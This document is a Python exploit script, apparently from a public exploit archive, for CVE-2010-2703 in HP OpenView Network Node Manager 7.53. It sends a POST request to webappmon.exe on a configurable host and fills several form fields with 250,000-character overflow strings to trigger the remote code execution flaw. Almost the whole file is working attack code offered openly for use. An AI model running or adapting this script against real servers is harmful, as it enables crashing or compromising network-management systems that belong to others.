49 lines
No EOL
1.5 KiB
Python
Executable file
49 lines
No EOL
1.5 KiB
Python
Executable file
'''
|
|
__ __ ____ _ _ ____
|
|
| \/ |/ __ \ /\ | | | | _ \
|
|
| \ / | | | | / \ | | | | |_) |
|
|
| |\/| | | | |/ /\ \| | | | _ <
|
|
| | | | |__| / ____ \ |__| | |_) |
|
|
|_| |_|\____/_/ \_\____/|____/
|
|
|
|
'''
|
|
|
|
'''
|
|
Title : HP OpenView NNM webappmon.exe execvp_nc Remote Code Execution
|
|
Version : OpenView Network Node Manager 7.53
|
|
Analysis : http://www.abysssec.com
|
|
Vendor : http://www.hp.com
|
|
Impact : Critical
|
|
Contact : shahin [at] abysssec.com , info [at] abysssec.com
|
|
Twitter : @abysssec
|
|
CVE : CVE-2010-2703
|
|
|
|
http://www.exploit-db.com/moaub-6-hp-openview-nnm-webappmon-exe-execvp_nc-remote-code-execution/
|
|
'''
|
|
|
|
import socket,sys
|
|
|
|
ip = "localhost"
|
|
port = 80
|
|
|
|
target = (ip, port)
|
|
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.connect(target)
|
|
exp = "A"*250000
|
|
headers = "POST /OvCgi/webappmon.exe HTTP/1.0\r\n"
|
|
headers += "From: shahin@abysssec.com\r\n"
|
|
headers += "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1;Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)\r\n"
|
|
headers += "Content-Type: application/x-www-form-urlencoded\r\n"
|
|
arg = 'ins=%s&sel=%s&app=%s&act=%s&arg=%s&help=%s&cache=1600 HTTP/1.1\r\n' % ("nowait", "localhost",exp,"ping",exp,exp)
|
|
headers += 'Content-Length: %d\r\n' %(len(arg))
|
|
headers += "\r\n"
|
|
headers += arg
|
|
s.sendall(str(headers))
|
|
while 1:
|
|
buf = s.recv(1000)
|
|
if not buf:
|
|
break
|
|
sys.stdout.write(buf)
|
|
|
|
s.close() |